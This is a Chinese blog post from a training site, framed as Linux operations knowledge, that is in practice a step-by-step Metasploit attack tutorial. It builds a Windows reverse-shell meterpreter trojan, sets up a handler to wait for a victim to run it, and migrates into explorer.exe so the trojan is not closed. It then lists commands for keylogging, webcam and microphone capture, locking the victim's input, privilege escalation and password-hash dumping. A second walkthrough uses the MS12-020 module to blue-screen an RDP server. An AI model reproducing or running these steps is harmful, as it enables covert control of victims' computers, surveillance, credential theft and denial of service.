Linux运维知识之kali linux 远程攻击
小标 2018-09-07 来源 : 阅读 3670 评论 0

摘要:本文主要向大家介绍了Linux运维知识之kali linux 远程攻击,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。

本文主要向大家介绍了Linux运维知识之kali linux 远程攻击,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。

1启动:msfconsole

 

 

exploit   漏洞利用工具

payloads    ----àshellcode    漏洞利用后执行的代码

 

木马      控制      服务器

        远程控制     木马程序

 

2.根据自己的ip生成一个木马

msfpayload windows/meterpreter/reverse_tcp LHOST=linux的ip LPORT=55555 X > test.exe

windows/meterpreter/reverse_tcp  目录

LHOST 本地的IP

LPORT  端口 (高端口容易过防火墙)

X 二进制    >  写    test.exe  二进制文件(木马程序)

 

 

主文件夹下

3.

 use exploit/multi/handler

使用handler这个模块

4.使用show options 查看参数(发现无参数)

.

5.直接选下一个 set PAYLOAD windows/meterpreter/reverse_tcp

reverse_tcp 反向的链接(使用 shellcold 程序)

 

6.此时再次查看参数 show options

 

 

LHOST   =  生成木马的linux IP 地址   (均要填写)

LPORT   =  高端口  55555

7.填写生成木马的ip 以及端口

set LHOST  linux IP

set LPORT  55555

 

生成完后,再次查看是否填写 show options

 

8.执行 exploit (等待链接状态)

等待点击木马

 

 

 

 

 

 

 

 

 

Metasploit(工具使用)

 

background  将会话放入后台

sessions -l 查看后台的会话

sessions -i 1  切换回刚才的会话

注入进程(防止木马被关闭)

ps  得到想要的PID进程

migrate PID  注入  

(216   184   explorer.exe  桌面管理进程)

migrate 216   注入

(查看进程 PS)

例如 meterpreter>  run vnc  开启远程桌面

文件管理功能 (file  system  commands)

download

edit (编辑文件) 后面直接加文件名

cat(查看文件)

mkdir (创建文件夹)

mv (移动文件)

rm (删除文件)

upload (上传)

rmdir (删除文件夹)

 

网络和系统操作 Networking commands

arp (查看arp缓存表)

getproxy (获取本机的代理)

ifconfig

ipconfig

netstat (查看本机的端口链接)

系统操作

kill   结束进程   (后面直接跟进程的PID号)

ps    查看进程

reboot   重启

reg    修改注册表

shell   获取终端

shutdown  关机

sysinfo   获取电脑信息

用户和其余操作  user interface commands

enumdesktops   用户登录数

keyscan_dump   键盘记录_下载

keyscan_start    键盘记录_开始

keyscan_stop    键盘记录_停止

uictl     获得键盘鼠标控制权

 

 

摄像头操作

record_mic    音频录制

webcam_chat  查看摄像头接口

webcam_list    查看摄像头列表

webcam_stream  摄像头视频录制

getsystem  获取高权限

hashdump  下载管理员的哈希密文

键盘记录的用法

1).先keyscan_start  开始记录

2). 再次 keyscan_dump  下载查看记录

3). Keyscan_stop  停止监听

键盘鼠标的锁定

uictl -h  查看参数

enable(打开) disable(锁定)   keyboard(键盘) mouse(鼠标)

例:uictl  disable  keyboard  锁定键盘  

注:键盘锁定时,win+E  任然可以用

音频录制:先查看参数在录制

 

 

 

 

 

Metasploit—(服务器蓝屏攻击)

条件:服务器必须开启 3389 端口( netstat –an  可进行查看)

目标:(DDOS 攻击)192.168.X.X

漏洞名称:MS12—020

1启动:msfconsole

2.输入 search ms12-020

解释:

auxiliary/dos/windows/rdp/ms12_020_maxchannelids

服务器远程桌面的模块

auxiliary/scanner/rdp/ms12_020_check

查看是否存在该漏洞

3. 检查 use auxiliary/scanner/rdp/ms12_020_check

(查看参数 show options)

RHOSTS       以R开头为远程主机

4.set RHOSTS 服务器的IP

5. 查看该端口是否存在  exploit

6.换模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

7.查看参数 show options   

写入IP :  set RHOST  服务器IP   再次查看是否设置成功

8.重新开一个终端,用ping (服务器) :正常应为ping通

(在网站的搜索栏,进入看是否能进入:输入服务器的IP)

 

 

9. 输入 exploit  攻击开始

结果:服务器蓝屏,无法ping 通

开启:3389:

//blog.csdn.net/bekilledlzy/article/details/1817637

Ms12-020解决措施

//cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm

 

 

注:

如果对方开启了防火墙或者修改了3389端口,可以通过下面方式查看:有一个 XXXX/tcp open realserver  (可疑)

端口讲解

//vip.2cto.com/jc/241.html

本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注系统运维Linux频道!

本文由 @小标 发布于职坐标。未经许可,禁止转载。
喜欢 | 2 不喜欢 | 0
看完这篇文章有何感觉?已经有2人表态,100%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式AI+学习就业服务平台 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved